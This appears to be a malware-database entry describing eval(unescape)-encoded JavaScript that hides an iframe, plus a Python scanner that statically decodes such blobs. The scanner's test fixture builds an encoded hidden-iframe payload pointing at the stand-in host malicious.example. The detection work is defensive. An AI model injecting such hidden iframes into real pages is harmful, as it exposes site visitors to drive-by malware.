
Malware entry: MW:IFRAME:HD28

Description: JavaScript encoding used to hide a malicious iframe.

Sites used in this attack:

This is used to load malware from external web sites while not being visible to the user.

Affecting: Any web site (no specific target)

Details: Usually starts with an "eval(unescape" call followed by a large chunk of encoded text.
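
One way to check a page for this pattern, as an added example (not the signature itself and not code from this entry): the Python below statically decodes any long eval(unescape("...")) blob without executing it and reports iframes found in the result. The sample pages, the host malicious.example, and the 40-character and 50% thresholds are constructed assumptions.

```python
import re

# eval(unescape("...")) whose argument is a long quoted string (threshold is an assumption).
CALL = re.compile(r"""eval\s*\(\s*unescape\s*\(\s*(['"])([^'"]{40,})\1\s*\)\s*\)""", re.I)
ESC = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
SRC = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)
# Attributes that keep the frame out of the visitor's sight.
HIDDEN = re.compile(
    r"""(?:width|height)\s*=\s*["']?[01]\b|display\s*:\s*none|visibility\s*:\s*hidden""",
    re.I)

def js_unescape(s):
    """Static equivalent of JavaScript unescape(): decodes %XX and %uXXXX."""
    return ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def scan(text, min_encoded_ratio=0.5):
    """Return one finding per iframe hidden inside an eval(unescape(...)) blob."""
    findings = []
    for m in CALL.finditer(text):
        blob = m.group(2)
        encoded = sum(len(e.group(0)) for e in ESC.finditer(blob))
        if encoded / len(blob) < min_encoded_ratio:
            continue  # mostly plain text, not an encoded payload
        decoded = js_unescape(blob)  # decoded only, never evaluated
        for tag in IFRAME.finditer(decoded):
            src = SRC.search(tag.group(0))
            findings.append({
                "offset": m.start(),
                "src": src.group(1) if src else None,
                "hidden": bool(HIDDEN.search(tag.group(0))),
            })
    return findings

# Constructed samples, not the original malware sample.
_payload = ('document.write(\'<iframe src="http://malicious.example/in.php" '
            'width="1" height="1" style="visibility:hidden"></iframe>\');')
SAMPLE_INFECTED = ('<html><body><p>Hello</p><script>eval(unescape("'
                   + "".join("%%%02X" % ord(c) for c in _payload)
                   + '"))</script></body></html>')
SAMPLE_CLEAN = '<html><body><iframe src="/map.html" width="400"></iframe></body></html>'

if __name__ == "__main__":
    for name, page in (("infected", SAMPLE_INFECTED), ("clean", SAMPLE_CLEAN)):
        print(name, scan(page))
```
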

Malware sample:

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb